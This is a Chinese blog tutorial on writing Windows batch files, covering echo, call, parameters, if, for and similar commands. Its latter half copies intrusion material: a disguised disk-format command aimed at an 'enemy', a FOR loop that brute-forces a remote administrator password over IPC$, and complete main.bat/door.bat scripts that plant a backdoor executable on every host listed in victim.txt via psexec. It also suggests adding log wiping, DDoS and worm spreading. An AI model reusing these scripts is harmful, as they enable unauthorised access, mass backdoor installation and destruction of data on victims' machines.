编辑bat批处理文件相关的知识 - 挽星 - 博客园
&rd&是删除目录的命令，它是Remove Directory的缩写 &md&是建立目录的命令，它是Make Directory的缩写 &cd&是更换当前目录的命令，它是Change Directory的缩写 &deltree&是删除目录树的命令 &/s&参数是删除该目录下所有子目录 &/q&参数是不进行确认提示直接删除 以上命令均是MS-DOS操作系统的命令引入，DOS里的目录就是Windows里的文件夹，名称不同但实质相同。由Windows 2000开始，&deltree&命令已经被功能增强了的&rd&命令代替。
　如何创建批处理文件？
　　　　不要听了批处理文件就感到很神气，其实这东西很简单的．你用过记事本没有？用过？　好的．将记事本打开，什么都不用写，然后选择文件，保存．保存类型选择所有文件，文件名则命名为　＊．bat　这个＊代表是文件名，你可以随便的起．保存好之后，看看你保存的地方，会出现一个白色窗口里有个黄色齿轮的图标．这东西就是你创建的批处理文件，双击他就可以运行，但他现在由于里面没有输入任何命令，所以他运行了并不会做任何事情．当我们想往这个＊.bat文件中添加东西时，只要右键选择他，然后选择编辑，就可以打开记事本往内输入命令了．
　　批处理文件中的命令是什么？
　　批处理文件中的命令暂时先可以理解为dos命令，等稍后深入理解了以后再进行解释．批处理顾名思义就是一大堆东西堆在一起处理．换句话说就是往里面写一条条dos命令，然后按顺序挨个执行，效果跟你在cmd里敲dos命令是一个效果．只不过用批处理写好之后，要运行只要双击下就可以运行了．而不用再一遍一遍的重复的往里面打命令．这就是批处理文件的好处．
　　除了运行dos命令之外，他还可以支持选择结构if，循环结构for，goto等，与c有点类似，但远没有c全面，并且编写语言十分不规范．
　　批处理语法：
先讲个最基本的东西　@echo off
　　echo的意思是回旋，这里的意思就是回显，echo　off意思就是关闭回显．前面的@表示echo off 这一行也不会回显你可以试着去掉@和整行去掉．@的另一个功能是在执行完批处理文件时自动恢复命令回显。如果第一句用的是ECHO OFF，那么在执行完批处理文件以后不会显示命令提示符。
举个例子：如果我们先创建一个１．bat文件，往里面输入：
dir&然后保存在c：＼下．然后我们运行cmd，进入c盘根目录下，输入１．bat，则显示：
&驱动器 C 中的卷没有标签。
&卷的序列号是 0C5D-07FF
&C:\ 的目录
& 00:45&&& &DIR&&&&&&&&&& WINDOWS
& 00:51&&& &DIR&&&&&&&&&& Documents and Settings
...........
如果将１．bat内容修改成
然后再在cmd里输入１．bat，则会显示&
C:\&echo off　　　　　　　//因为运行了echo　off，所以没有显示dir命令，直接显示了结果
&驱动器 C 中的卷没有标签。
&卷的序列号是 0C5D-07FF
&C:\ 的目录
& 00:45&&& &DIR&&&&&&&&&& WINDOWS
& 00:51&&& &DIR&&&&&&&&&& Documents and Settings
．．．．．
如果将１．bat文件修改成：
则显示成：
C:\&1.bat&&&&&&&& //与前面不同，并没有显示echo　off，原因是加了＠，所以不显示＠后面的内容．又因为加
　　　　　　　　//了echo　off，所以后面的命令不显示，直接显示结果
&驱动器 C 中的卷没有标签。
&卷的序列号是 0C5D-07FF
&C:\ 的目录
& 00:45&&& &DIR&&&&&&&&&& WINDOWS
& 00:51&&& &DIR&&&&&&&&&& Documents and Settings
通过以上的比较，相信你对echo　off命令已经充分掌握了．现在已经１点了．．．写得累啊！！！洗澡睡觉去了
－－－－－－－－－－－－－－－－－－－－－－
早晨６点就被拉起来了．．．我命苦啊，那么继续写吧
－－－－－－－－－－－－－－－－－－－－－－
接下来讲的是call命令：
call是打电话的call，而不是＂喔靠＂的靠：）．call的意思为调用．假如有２个批处理文件a.bat和b.bat．如果我想运行a.bat的当中运行b.bat．如何运行呢？其实很简单，只要在a.bat文件中输入call命令，则可以在a.bat运行的当中，运行b.bat，等b.bat运行完之后，继续执行a.bat
call命令格式：
CALL [drive:][path]filename [batch-parameters]
& batch-parameters&& 指定批处理程序所需的命令行信息。
举例如下，我们在c盘根目录下创建a．bat文件，内容为:
echo　this is a.bat
call d:\b.bat
然后在d盘根目录下创建b.bat，内容为：
echo this is b.bat
保存后，打开cmd，进入c盘根目录，然后输入1.bat，显示如下：
C:\&echo this is a.bat
this is a.bat
C:\&call d:\b.bat
C:\&echo this is b.bat
this is b.bat
C:\&echo done
由例子很容易看出来，是先运行a.bat的内容，直到遇到call　b.bat后，则调用b.bat，运行完b.bat后，再返回a.bat接着运行call　b.bat后面的echo　done语句，直至将a.bat的所有批处理命令运行完．
注：里面有个[batch-parameters]里面的所指的参数是什么，知道的朋友能否告知，不胜感激．
PAUSE 命令
暂停批处理程序的执行并显示一条消息，提示用户按任意键继续执行。只能在批处理程序中使用该令。
&表示此命令后的字符为解释行（注释），不执行，只是给自己今后参考用的（相当于程序中的注释）．
同时你可以用两个冒号来替代rem．如：　::等同于一个rem．但他们有个区别，就是用::作注释的话他是不回显的，即使你打echo　on强制回显也没有同的．同时rem可以在config.sys中加注释．
语法： rem[commnet]
批处理文件参数：
有点变成基础的人都知道函数有参数．批处理文件也有参数．
我打个比方，希望能帮助没有语言基础的人也能看的非常明白．　
我从例子里开始吧．首先在c盘根目录下创建一个批处理文件 a．bat，里面输入内容
然后打开cmd，然后进入c盘根目录．输入：a "this is a canshu"
得到结果如下：
C:\&a.bat "this is a test"
C:\&echo "this is a test"
"this is a test"
　　输入的a "this is a canshu"中，a为新建的a.bat的文件名a（后面的.bat可写也可不写），而a后面的　"this is a canshu"这句话就是参数，写在这的参数，在程序运行中就将参数自动放到批处理程序中去．那么放在什么位置呢？就是放在　%1的地方．
　　看了例子，让我们看看整个关于参数的定义如何：
　　批处理文件还可以像C语言的函数一样使用参数（相当于DOS命令的命令行参数），这需要用到一个参数表示符"%"。
　　%[1-9]表示参数，参数是指在运行批处理文件时在文件名后加的以空格（或者Tab）分隔的字符串。变量可以从%0到%9，%0表示批处理命令本身，其它参数字符串用%1到%9顺序表示。//我们上个程序的例子里就有％１，他就是参数，而输入中＂this　is　a　test＂作为参数就直接放到％１的位置，于是程序就变成了 echo "this is a test"．
　　再举几个例子帮助你理解：
C:根目录下一批处理文件名为b.bat，内容为:
type %1 　　　　//type为dos中的输出命令，可以用来输出文本文件的内容，比如我们新建一个１．txt文件
　　　　　　　　　//里面输入内容，保存．进cmd，如果输入１．txt则看不了１．txt文件内容，但是如果我
　　　　　　　　　//想看怎么办呢？这时候可以用type命令，只要在cmd里输入type　１．txt就能显示
　　　　　　　　　//１．txt文件中的内容了　
那么运行C:\&b a.txt b.txt
%1 : 表示a.txt
%2 : 表示b.txt
于是上面的批处理命令就变成了
type a.txt
type b.txt
于是上面的命令将顺序地显示a.txt和b.txt文件的内容。
没有编程基础的人可能要问，干什么要弄个参数啊？在后面加个参数多麻烦啊？直接往里面写不就好了啊？！其实这样想有对的方面也有错的方面．还是举个例子说明吧．
第一步还是在c盘根目录下新建一个批处理文件，我们取名仍为a.bat．往里面的内容输入为：
ping %1　　//ping命令可以简单理解为测试一台机器开着还是没有开，如果开着的话，他就回给你回送回应．
然后进cmd，我们想测试下１６３的服务器是不是开着，则输入a
　　对于知道ping命令的人，可以打ping进行检查，但如果想ping的人不知道ping命令怎么用，那怎么办啊？这时候你就可以把命令预先输入到批处理文件中，保存好，然后让不会用的人进cmd，运行你的批处理文件，文件名后面加上他要ping　的网站地址就行了．换句话说，他想ping　１６３就直接加１６３的网址，想ping　sina就直接加sina的网址．这样只要输入一个参数，而不用改程序本身，整个程序的通用性就大大提高了．
　　这是对于一个简单的ping命令，你或许觉得用参数不值得，还是直接改不就好了啊．但如果程序有很多条，你一下找不到在哪改怎么办啊？所以，不管你是菜哥，菜弟，菜姐，菜妹，只要运行下，输入参数，结果自己就会出来，不用再象你一样，考虑怎么编写批处理文件．人家只要知道是输入什么东西能让批处理程序运行，而编写的人则想的是如何让不懂程序的人能运行程序．
　　批处理参数就这么简单，不知道你理解了没有？但如果你想深一步了解批处理参数，可以接着往下看，如果不想深入了解，知道现在这么多也就够了．
以下粉红色内容为网上资料．
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
　　因为参数只有１％－９％，但当我们要引用第十个或更多个参数时, 就必须移动DOS 的参数起始指针. shift 命令正充当了这个移动指针的角色, 它将参数的起始指针移动到下一个参数, 类似C 语言中的指针操作. 图示如下:
初始状态, cmd 为命令名, 可以用 %0 引用
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10&
&^&&&& ^&&&&& &^&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^
&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&& &&&&&&& &&&&&&& &&&&&&&& &&&&&&& &&&&&&& &
%0& %1&& &%2& &%3&& %4&& %5&& %6&&& %7&& %8&& %9
经过1次shift后, cmd 将无法被引用
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
&^&&&& ^&&&&& &^&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^
&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&& &&&&&&& &&&&&&& &&&&&&&& &&&&&&& &&&&&&& &
%0& %1&& &%2& &%3&& %4&& %5&& %6&&& %7&& %8&& %9
经过2次shift后, arg1也被废弃, %9指向为空, 没有引用意义
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10&
&^&&&& ^&&&&& &^&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^&&&&& ^
&&&&&&&&&&&&&&&&& &&&&&&&&&&&&&&& &&&&&&& &&&&&&& &&&&&&&& &&&&&&& &&&&&&& &
%0& %1&& &%2& &%3&& %4&& %5&& %6&&& %7&& %8&& %9
遗憾的是, win9x 和DOS下均不支持 shift 的逆操作. 只有在 nt 内核命令行环境下, shift 才支持 /n 参数, 可以以第一参数为基准返复移动起始指针.
=================
if goto choice for高级语法
今天就写到这吧，我收拾收拾东西准备滚蛋回学校了．可能if　goto　choice　for高级语法要在沈阳才能完成了，祝我好运吧．
======================
学校的"网吧"终于算重新开张了,抓紧时间把剩下的写完
说得通俗点，if就相当于我们白话里的如果．
举个例：如果a喜欢b，那么a就要娶b．　这句话翻译成计算机语言就成了
if　a喜欢b　a就要娶b．
当然拉，计算机不可能理解a喜欢b，a就要娶b这两句话，这里只是举个例子让你方便理解．
if语句一共有3种模式,如下:
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
IF [NOT] ERRORLEVEL number command
　NOT&&&&&&&&&&&&&& 指定只有条件为 false 的情况下， Windows XP 才应该执行该命令。
　ERRORLEVEL number 如果最后运行的程序返回一个等于或大于指定数字的退出编码，指定条件为 true。
　string1==string2& 如果指定的文字字符串匹配，指定条件为 true。
　EXIST filename&&& 如果指定的文件名存在，指定条件为 true。
　command&&&&&&&&&& 如果符合条件，指定要执行的命令。如果指定的条件为 FALSE，命令后可跟一个执行 ELSE关键字后的命令的 ELSE 命令。
我们先讲解第一种:
IF [NOT] string1==string2 command
自然语句意思：如果string1＝＝string2，那么执行command
下面再举个能实际应用的if语句．
自然语句：如果输入的参数为３，那么显示＂a＝３＂
计算机语句：
if "%1"=="3" echo "a=3"
if %1==3 echo "a=3"
注意:当要测试的时候,因在cmd底下,输入1.bat 3.因为这里用了是传递参数,具体看文章前部分"批处理文件参数".
IF [NOT] EXIST filename command
这条命令用语检测文件是否存在．如果存在，执行command．如果不存在，则什么也不显示．
如：我们想检查e盘根目录下是否有一个叫２.txt的文件．如果存在，则显示exist．如果不存在，则什么也不显示．
批处理命令如下：
if exist e:\2.txt echo "exist 2.txt"
IF [NOT] ERRORLEVEL number command
这个我引用点资料，感觉别人写得更详细，引用部分为粉色字部分：
if errorlevel &数字& 待执行的命令
很多DOS程序在运行结束后会返回一个数字值用来表示程序运行的结果(或者状态)，通过if errorlevel命令可以判断程序的返回值，根据不同的返回值来决定执行不同的命令(返回值必须按照从大到小的顺序排列)。如果返回值等于指定的数字，则条件成立，运行命令，否则运行下一句。
如if errorlevel 2 goto x2
==== 注 ===========
返回值从大到小的顺序排列不是必须的, 而只是执行命令为 goto 时的习惯用法, 当使用 set 作为执行命令时, 通常会从小到大顺序排列, 比如需将返回码置入环境变量, 就需使用以下的顺序形式:
if errorlevel 1 set el=1
if errorlevel 2 set el=2
if errorlevel 3 set el=3
if errorlevel 4 set el=4
if errorlevel 5 set el=5
当然, 也可以使用以下循环来替代, 原理是一致的:
for %%e in (1 2 3 4 5 6 7 8...) do if errorlevel %%e set el=%%e //此处为一个for循环，后面会继续　　　　　　　　　　　　　　　　　　　　　　　　介绍到的，看不懂可以先跳过去
if errorlevel 比较返回码的判断条件并非等于, 而是大于等于. 由于 goto 的跳转特性, 由小到大排序会导致在较小的返回码处就跳出; 而由于 set命令的 "重复" 赋值特性, 由大到小排序会导致较小的返回码 "覆盖" 较大的返回码.
另外, 虽然 if errorlevel=&数字& command 也是有效的命令行, 但也只是
解释命令行时将 = 作为命令行切分符而忽略掉罢了
choice命令
for命令其实就是一个循环命令,如果我们想重复一个语句,就可以用for命令.通过for命令,可以控制循环的次数等.
FOR %variable IN (set) DO command [command-parameters]
& %variable& 指定一个单一字母可替换的参数。
& (set)&&&&& 指定一个或一组文件。可以使用通配符。
& command&&& 指定对每个文件执行的命令。
& command-parameters
&&&&&&&&&&&& 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I.
　　不知道你你看懂了没有，其实还是很容易理解的，还是举个例子吧．我想用type打印所有c盘根目录下的bat文件和txt文件．dos底下命令就是　type　＊．bat　＊.txt．先将该文件保存在c盘根目录下,名称为a.bat
用for命令如下：
for %%t in (*.bat *.txt) do type %%t
%%t其实就是代表的一个参数，他的内容在in() 里面括号里的内容.也就是说这句话里的%%t就变成了*.bat *.txt了.do就是做的意思,执行type命令,而type后面是%%t,而%%t又是*.bat *.txt.所以原来这句命令的意思就变成了:
type *.bat *.txt
执行时进cmd,然后到c盘根目录下输入a.bat就可以打印出c盘根目录下所有扩展名为.bat和.txt的文件内容了.
这里要注意：in后面有个空格．
在xp底下,for命令扩展名被起用因此for的功能变得更加强大.下面讲一个真正的循环.
FOR /L %variable IN (start,step,end) DO command [command-parameters]
&&& 该集表示以增量形式从开始到结束的一个数字序列。
&&& 因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生
&&& 序列 (5 4 3 2 1)
里面第一个1在start的位置,意思是起始位置,第2个1在step位置,英文意思是跨步,在这里面的意思是每次增量为1.后面的5在end的位置,意思是结束时的大小.
这句话的意思就是从1(start)开始增加,每次增加1(step),一直到变到5(end)为止.
这个有什么用呢?其实我感觉这个东西的用处还是很大的.举个最简单的例子,我们想重复回显"i am the best"这句话,重复显示10遍.那么for命令如下:
for /L %%e in (1,1,10) do echo "i am the best"
这时,cmd就会重复输入"i am the best"10遍.
===============================================
看完整篇文章了吗?咳...我写的不容易啊....
现在不知道你对bat有了什么样的理解，我现在的感觉就是bat就是dos命令的组合，你把dos命令全写进bat命令，只要运行下bat就会挨个执行dos命令，这无疑提供了不少的方便。
下面我再举些实例.
删除默认共享:
对于默认共享不知道你了解多少,反正留着是个隐患,现在唯一的办法好象只能做个bat文件进行删除.命令如下:
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete
net share e$ /delete
里面的c　d　e为你的盘符。如果你只有一个分区，那么写到net share c$ /delete为止就可以了。如果你有n个分区，那么就挨个写下去。
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete&&
登陆到局域网的机器快捷方式(对方机器有密码且为2000或以上系统)
[密码] /user:[用户名]
bat文件备份注册表
set regfile=%date%&& //设置变量，下面出现%regfile%的都自动替换&当天date&
if exist "%regfile%" goto end&& //如果发现当天date命名的目录，跳到文件尾。
md temp&&&&&& //建temp目录
call 1.bat&&&&& //调用1.bat
del& 1.bat&&&&&&&&&
ren 2.bat 1.bat
ren 3.bat 2.bat
ren 4.bat 3.bat
echo move& "%regfile%"& temp &4.bat& //写 移动&当天date命名的目录&到temp的bat文件& 。
md "%regfile%"&& //建当天date命名的目录
cd "%regfile%"& //进入
reg export hkcu hkcu.reg&& //导出注册表
reg export hklm hklm.reg&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&& //HKEY_CURRENT_USER& 缩写hkcu 。存放当前用户个人数据
&&&&&&&&&&&&&&&&&&&&&&&&&&&&& //HKEY_LOCAL_MACHINE& 缩写hklm 。系统的核心数据
deltree /y& temp &nul&&&&&&& ////返回上级目录& ，删temp文件夹
一.简单批处理内部命令简介&1.Echo&命令&打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo&命令将显示当前回显设置。&语法&echo&[{on│off}]&[message]&Sample：@echo&off&/&echo&hello&world&在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用&&&&&^）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。&2.@&命令&表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。&Sample：@echo&off&@echo&Now&initializing&the&program,please&wait&a&minite...&@format&X:&/q/u/autoset&(format&这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和/y是一样的。)&3.Goto&命令&指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。&语法：goto&label&（label是参数，指定所要转向的批处理程序中的行。）&Sample：&
if&{%1}=={}&goto&noparms&if&{%2}=={}&goto&noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。）&@Rem&check&parameters&if&null&show&usage&:noparms&echo&Usage:&monitor.bat&ServerIP&PortNumber&goto&end&
标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。&4.Rem&命令&注释命令，在C语言中相当与/*--------*/,它并不会被执行，只是起一个注释的作用，便于别人阅读和你自己日后修改。&Rem&Message&Sample：@Rem&Here&is&the&description.&5.Pause&命令&运行&Pause&命令时，将显示下面的消息：&Press&any&key&to&continue&.&.&.&Sample：&@echo&off&:begin&copy&a:*.*&d：\back&echo&Please&put&a&new&disk&into&driver&A&pause&goto&begin&在这个例子中，驱动器&A&中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器&A&时，pause&命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。&6.Call&命令&从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call&命令接受用作调用目标的标签。如果在脚本或批处理文件外使用&Call，它将不会在命令行起作用。&语法&call&[[Drive:][Path]&FileName&[BatchParameters]]&[:label&[arguments]]&参数&[Drive:}[Path]&FileName&指定要调用的批处理程序的位置和名称。filename&参数必须具有&.bat&或&.cmd&扩展名。&7.start&命令&调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。&入侵常用参数：&MIN&开始时窗口最小化&SEPARATE&在分开的空间内开始&16&位&Windows&程序&HIGH&在&HIGH&优先级类别开始应用程序&REALTIME&在&REALTIME&优先级类别开始应用程序&WAIT&启动应用程序并等候它结束&parameters&这些为传送到命令/程序的参数&执行的应用程序是&32-位&GUI&应用程序时，CMD.EXE&不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。&8.choice&命令&choice&使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提示可输入的字符，之间无空格。它的返回码为1234......&如:&choice&/c:dme&defrag,mem,end&将显示&defrag,mem,end[D,M,E]?&Sample：&Sample.bat的内容如下:&
@echo&off&choice&/c:dme&defrag,mem,end&if&errorlevel&3&goto&defrag&（应先判断数值最高的错误码）&if&errorlevel&2&goto&mem&if&errotlevel&1&goto&end&:defrag&c:\dos\defrag&goto&end&:mem&mem&goto&end&:end&echo&good&bye&
此文件运行后，将显示&defrag,mem,end[D,M,E]?&用户可选择d&m&e&，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto&end将程序跳到end标号处，然后程序将显示good&bye，文件结束。&9.If&命令&if&表示将判断是否符合规定的条件，从而决定执行不同的命令。&有三种格式:&1、if&"参数"&==&"字符串"&　待执行的命令&参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号）&如if&"%1"=="a"&format&a:&if&{%1}=={}&goto&noparms&if&{%2}=={}&goto&noparms&2、if&exist&文件名　&待执行的命令&如果有指定的文件，则条件成立，运行命令，否则运行下一句。&如if&exist&config.sys&edit&config.sys&3、if&errorlevel&/&if&not&errorlevel&数字　&待执行的命令&如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。&如if&errorlevel&2&goto&x2&　&DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。&10.for&命令&for&命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。&在批处理文件中使用&FOR&命令时，指定变量请使用&%%variable&
for&{%variable│%%variable}&in&(set)&do&command&[&CommandLineOptions]
&%variable&指定一个单一字母可替换的参数。&(set)&指定一个或一组文件。可以使用通配符。&command&指定对每个文件执行的命令。&command-parameters&为特定命令指定参数或命令行开关。&在批处理文件中使用&FOR&命令时，指定变量请使用&%%variable&而不要用&%variable。变量名称是区分大小写的，所以&%i&不同于&%I&如果命令扩展名被启用，下列额外的&FOR&命令格式会受到支持:&
FOR&/D&%variable&IN&(set)&DO&command&[command-parameters]
&如果集中包含通配符，则指定与目录名匹配，而不与文件名匹配。
FOR&/R&[[drive:]path]&%variable&IN&(set)&DO&command&[command-&
检查以&[drive:]path&为根的目录树，指向每个目录中的FOR&语句。如果在&/R&后没有指定目录，则使用当前&目录。如果集仅为一个单点(.)字符，则枚举该目录树。&
FOR&/L&%variable&IN&(start,step,end)&DO&command&[command-para
该集表示以增量形式从开始到结束的一个数字序列。&因此，(1,1,5)&将产生序列&1&2&3&4&5，(5,-1,1)&将产生序列&(5&4&3&2&1)。&
FOR&/F&["options"]&%variable&IN&(file-set)&DO&command&FOR&/F&["options"]&%variable&IN&("string")&DO&command&FOR&/F&["options"]&%variable&IN&('command')&DO&command&
或者，如果有&usebackq&选项:&FOR&/F&["options"]&%variable&IN&(file-set)&DO&command&FOR&/F&["options"]&%variable&IN&("string")&DO&command&FOR&/F&["options"]&%variable&IN&('command')&DO&command&filenameset&为一个或多个文件名。继续到&filenameset&中的下一个文件之前，每份文件都已被打开、读取并经过处理。&处理包括读取文件，将其分成一行行的文字，然后将每行解析成零或更多的符号。然后用已找到的符号字符串变量值调用&For&循环。以默认方式，/F&通过每个文件的每一行中分开的第一个空白符号。跳过空白行。您可通过指定可选&"options"参数替代默认解析操作。这个带引号的字符串包括一个或多个指定不同解析选项的关键字。这些关键字为:&eol=c&-&指一个行注释字符的结尾(就一个)&skip=n&-&指在文件开始时忽略的行数。&delims=xxx&-&指分隔符集。这个替换了空格和跳格键的默认分隔符集。&tokens=x,y,m-n&-&指每行的哪一个符号被传递到每个迭代的&for&本身。这会导致额外变量名称的格式为一个范围。通过&nth&符号指定&m符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之&分配并接受行的保留文本。&usebackq&-&指定新语法已在下类情况中使用:&在作为命令执行一个后引号的字符串并且引号字符为文字字符串命令并允许在&fi&中使用双引号扩起文件名称。&sample1:&
FOR&/F&"eol=;&tokens=2,3*&delims=,&"&%i&in&(myfile.txt)&do&command&
会分析&myfile.txt&中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给&for&程序体；用逗号和/或空格定界符号。请注意，这个&for&程序体的语句引用&%i&来取得第二个符号，引用&%j&来取得第三个符号，引用&%k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用&usebackq&选项，否则，双引号会被理解成是用作定义某个要分析的字符串的。&%i&专门在&for&语句中得到说明，%j&和&%k&是通过tokens=&选项专门得到说明的。您可以通过&tokens=&一行指定最多&26&个符号，只要不试图说明一个高于字母&'z'&或'Z'&的变量。请记住，FOR&变量是单一字母、分大小写和全局的；同时不能有&52&个以上都在使用中。&您还可以在相邻字符串上使用&FOR&/F&分析逻辑；方法是，用单引号将括号之间的&filenameset&括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，您可以用&FOR&/F&命令来分析命令的输出。方法是，将括号之间的&filenameset&变成一个反括字符串。该字符串会被当作命令行，传递到一个子&CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子:&FOR&/F&"usebackq&delims=="&%i&IN&(`set`)&DO&@echo&%i&会枚举当前环境中的环境变量名称。另外，FOR&变量参照的替换已被增强。您现在可以使用下列选项语法:&~I&-&删除任何引号(")，扩充&%I&%~fI&-&将&%I&扩充到一个完全合格的路径名&%~dI&-&仅将&%I&扩充到一个驱动器号&%~pI&-&仅将&%I&扩充到一个路径&%~nI&-&仅将&%I&扩充到一个文件名&%~xI&-&仅将&%I&扩充到一个文件扩展名&%~sI&-&扩充的路径只含有短名&%~aI&-&将&%I&扩充到文件的文件属性&%~tI&-&将&%I&扩充到文件的日期/时间&%~zI&-&将&%I&扩充到文件的大小&%~$PATH:I&-&查找列在路径环境变量的目录，并将&%I&扩充到找到的第一个完全合格的名称。如果环境变量未被定义，或者没有找到文件，此组合键会扩充空字符串可以组合修饰符来得到多重结果:&%~dpI&-&仅将&%I&扩充到一个驱动器号和路径&%~nxI&-&仅将&%I&扩充到一个文件名和扩展名&%~fsI&-&仅将&%I&扩充到一个带有短名的完整路径名&%~dp$PATH:i&-&查找列在路径环境变量的目录，并将&%I&扩充到找到的第一个驱动器号和路径。&%~ftzaI&-&将&%I&扩充到类似输出线路的&DIR&在以上例子中，%I&和&PATH&可用其他有效数值代替。%~&语法用一个有效的&FOR&变量名终止。选取类似&%I&的大写变量比较易读，而且避免与不分大小写的组合键混淆。以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。&sample2：&利用For命令来实现对一台目标Win2k主机的暴力密码破解。&我们用net&use&\\ip\ipc$&"password"&/u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。&最主要的命令是一条：for&/f&i%&in&(dict.txt)&do&net&use&\\ip\ipc$&"i%"&/u:"administrator"&用i%来表示admin的密码，在dict.txt中这个取i%的值用net&use&命令来连接。然后将程序运行结果传递给find命令－－&for&/f&i%%&in&(dict.txt)&do&net&use&\\ip\ipc$&"i%%"&/u:"administrator"│find&":命令成功完成"&&D:\ok.txt&，这样就ko了。&sample3：&你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。&主要命令也只有一条：（在批处理文件中使用&FOR&命令时，指定变量使用&%%variable）&@for&/f&"tokens=1,2,3&delims=&"&%%i&in&(victim.txt)&do&start&call&door.bat&%%i&%%j&%%k&tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i&%j&%k。&而cultivate.bat无非就是用net&use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If&errorlever&=）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。&delims=&表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i&%%j&%%k表示的对象来排列，一般就是&ip&password&username。&代码雏形：&
---------------&cut&here&then&save&as&a&batchfile(I&call&it&main.bat&)&---------------------------&@echo&off&@if&"%1"==""&goto&usage&@for&/f&"tokens=1,2,3&delims=&"&%%i&in&(victim.txt)&do&start&call&IPChack.bat&%%i&%%j&%%k&@goto&end&:usage&@echo&run&this&batch&in&dos&modle.or&just&double-click&it.&:end&---------------&cut&here&then&save&as&a&batchfile(I&call&it&main.bat&)&---------------------------&
-------------------&cut&here&then&save&as&a&batchfile(I&call&it&door.bat)&-----------------------------&@net&use&\\%1\ipc$&%3&/u:"%2"&@if&errorlevel&1&goto&failed&@echo&Trying&to&establish&the&IPC$&connection&............OK&@copy&windrv32.exe\\%1\admin$\system32&&&&if&not&errorlevel&1&echo&IP&%1&USER&%2&PWD&%3&&&ko.txt&@psexec&\\%1&c:\winnt\system32\windrv32.exe&@psexec&\\%1&net&start&windrv32&&&&if&not&errorlevel&1&echo&%1&Backdoored&&&ko.txt&:failed&@echo&Sorry&can&not&connected&to&the&victim.&-----------------&cut&here&then&save&as&a&batchfile(I&call&it&door.bat)&--------------------------------&
这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容&尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.&二.如何在批处理文件中使用参数&批处理中可以使用参数，一般从1%到&9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。&sample1：fomat.bat&
@echo&off&if&"%1"=="a"&format&a:&:format&@format&a:/q/u/auotset&@echo&please&insert&another&disk&to&driver&A.&@pause&@goto&fomat
&这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat&a，呵呵,好像有点画蛇添足了～&sample2：&当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ip&password&username&当着参数来赋给这个批处理，这样就不用每次都打命令了。&
@echo&off&@net&use&\\1%\ipc$&"2%"&/u:"3%"&注意哦，这里PASSWORD是第二个参数。&@if&errorlevel&1&echo&connection&failed&
